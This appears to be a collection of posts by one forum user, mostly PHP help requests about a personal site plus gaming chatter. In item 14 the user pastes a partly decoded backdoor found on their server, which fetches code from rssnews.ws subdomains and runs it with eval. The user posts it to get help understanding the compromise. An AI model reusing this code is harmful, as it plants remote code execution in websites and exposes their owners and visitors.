  1. I read into my code a bit more, and I was wondering if defining the title while I include it in my index.php code would work? Edit: Tried this, it doesn't work either. Also, PFMaBiSmAd, your answer doesn't help me at all, unfortunately...
  2. I have a dummy pagination script in place on my website that allows for links like index.php?id=whatever. This script some how makes my title defintion function not work. I dont get any errors, but it still wont show the correct title. Heres what I have: header.php (look inside title tag) <?php $time = microtime(); $time = explode(" ", $time); $time = $time[1] + $time[0]; $start = $time ?> <?php function ShowMenu() { echo'<div id="left"> <div class="navouter"> <div class="orange"></div> <div class="navheader">Main Menu</div> <div class="navcontent"> <ul> <li><a href="/index.php">Home</a></li> </ul> Stuff <ul> <li><a href="/index.php?id=about">About</a></li> <li><a href="/index.php?id=projects">Projects</a></li> <li><a href="/index.php?id=contact">Contact</a></li> <li><a href="http://paste.neverpool.com">Pastebin</a></li> </ul> </div> </div> <div class="navouter"> <div class="orange"></div> <div class="navheader">Friends</div> <div class="navcontent"> <ul> <li><a href="http://exile-studios.com" target="_BLANK">Exile Studios</a></li> </ul> </div> </div> </div>'; } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <?php include("/home/-/public_html/timer.txt"); ?> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title><?php if (defined('TITLE')) { print TITLE; } else { print 'NeverPool'; } ?></title> <link rel="stylesheet" type="text/css" href="/style.css" /> </head> <body onload="countdown(year,month,day,hour,minute)"> index.php <?php include('/home/-/public_html/header.php'); ?> <?php $id = $_GET['id']; if ($id == 'about') { include '/home/-/public_html/about.php'; } else if ($id == 'projects') { include '/home/-/public_html/projects.php'; } else if ($id =='contact') { include '/home/-/public_html/contact.php'; } else { ?> <div id="outer"> <div id="right"> <h1>The Elder Scrolls V: Skyrim</h1><div class="htimeauth"> 12/14/10 | <a href="/contact.php">Creech</a></div> <p>The newest installment of The Elder Scrolls series has been announced by Bethesda and I have to say, I'm VERY excited.. It uses the <a href="http://www.zlib.net/" target="_BLANK">zLib Library</a> to compress the created pastes. It features an indexing system that allows you to view recent posts made by other people, and it supports PHP syntax highlighting. It does not require a MySQL database of any kind, and as far as I know, it's completely secure. <del>I'm still working on the template for it</del>, but almost all of the PHP programming part of it is finished. </p> <p>Added 12/13/10: Added a link to the pastebin on my side menu. Here's another <a href="http://paste.neverpool.com">Link</a>. The template I said I was working on is not going to happen, I find it easier to just leave it white.</p> </div> Also, here is a live demonstration: http://neverpool.com Any help solving this problem would be very appreciated.
  3. Jesus Christ my eyes. Please change the font/background color and take out the comic sans if you be so kind Other than that, looks good to me.
  4. Do you want it to download from an external site to your site, or send some one a link and it (the download) starts automatically?
  5. Hullo I wrote this little script to show how long it takes a web page to load, and I want it to show exactly how long it takes, in milliseconds. Here's the code. <?php $time = round(microtime(), 3); //Page generation time top $time2 = round(microtime(), 3); //Page generation bottom $generation = $time2 - $time; substr($generation, 0, 5); echo "<p>This page took <strong>$generation seconds</strong> to render</p>"; ?>
  6. Well it's based in Vietnam, as far as I know. So oh well, I'll just have to wait for it to come out.
  7. Call of Duty: Vietnam will be revealed on SpikeTV late Friday night/Saturday morning. Knowing the guys that make the COD games, this will be a good game. http://www.gamespot.com/news/6260595.html?tag=mncol;txt
  8. His primary motivation is surely the learning curve (I think, he did mention willing to buy it) the underlying motivation is the money he could possibly earn with it. I almost know for a fact that he will implement some sort of mechanism where loosers players can buy their way to the top. I have played mafia wars for a while until some level 5 hits you with 3-times your defense, while reading the attack-log I noticed he had ALL epic weapons (which you can only get from the in-game store) 50-times (the number of mafia friends he had) I had over 300 and all were well equipped with weapons you get from loot-drops or could buy from the game (and have lowsy defense or offense). I really hate games that favor people who spend real money. Like battlefield heroes, has been fun for a while until EA noticed their ROI was going slow and thought they should support their low-lifes, hackers, .. euhm players more. Gaming isn't what it used to be I play COD:WOW now and then, the number of people that get banned for cheating in one session is almost 75% of what joined the server (don't mind my exaggeration here I just want to point out a lot of people get caught and banned). Or whiners on how he thinks you are such a big cheater and then starts a kick-spam against you. I die too, I have had a 3/50 k/d ratio but do you hear me complain? Move along, there are bigger problems in this world. I know how you feel man. Especially in those FTP games, like war rock, or Allods Online, players that pay for the game get a very large advantage over those who don't, which is really unfair.
  9. I'd have to agree with blmg on the red bar, totally unneeded. Also, there's a missing image in the footer, all you see is the alt code... Other than that, it looks fine.
  10. Hi, I recently wrote a very basic register script, and it doesn't work. I've looked through all my code and I can't find any errors! If you can help me out I'd appreciate it! The file is attached to the post. Live demo: http://neverpool.com/register.php [attachment deleted by admin]
  11. No, check your fatigue. The lower your fatigue, the less chance you have of hitting. Also, raise the level of your sword skill, which is a major factor to efficiency with the weapon.
  12. Open the consol, (~) Type coc Balmora Go to Causios (Spelled wrong, I know) house, Use his bed for free! I've been playing morrowind for years now. If you have any questions, just ask me
  13. I've changed my passwords and I've started a system scan on my server computer. What are the chances of this being a serious thing and not being just a bot that guess my stuff?
  14. After using a base64 decoder I found out that some of it leads to a website called "rssnews.ws", upon investigation I find that the server is unresponsive. Still have no clue what this does. Here's the decoded code: base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("rssnews.ws");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="k®œßtÛ]µÛÍÙ§iݸwŽ×¾õ") $f=$_REQUEST["id"];if((include(base64_decode("http://ads.").$f.$z)));else if($c=file_get_contents(base64_decode("http://7.").$f.$z))eval($c);else{$cu=curl_init(base64_decode("http://71.").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
  15. Hey I need some serious help. I was going through my directories and I found the following code in my website, I have no idea what it is, where it came from, or what it does. If you can help me I'd greatly appreciate it! The code is to long to fit in the message so I will attach the file. [attachment deleted by admin]
  16. I agree with Wooley. Also, a lot of the images don't show up when I click a category and the layout is a bit ugly in my opinion.
  17. Yes, Lol. But I can't really say anything, thats where I started. Then I "bought" my copy of Dreamweaver
  18. Rofl. This is great. I wonder if I can duplicate that...
  19. If you can help me out I'd appreciate it! http://test.neverpool.com/band/login.php
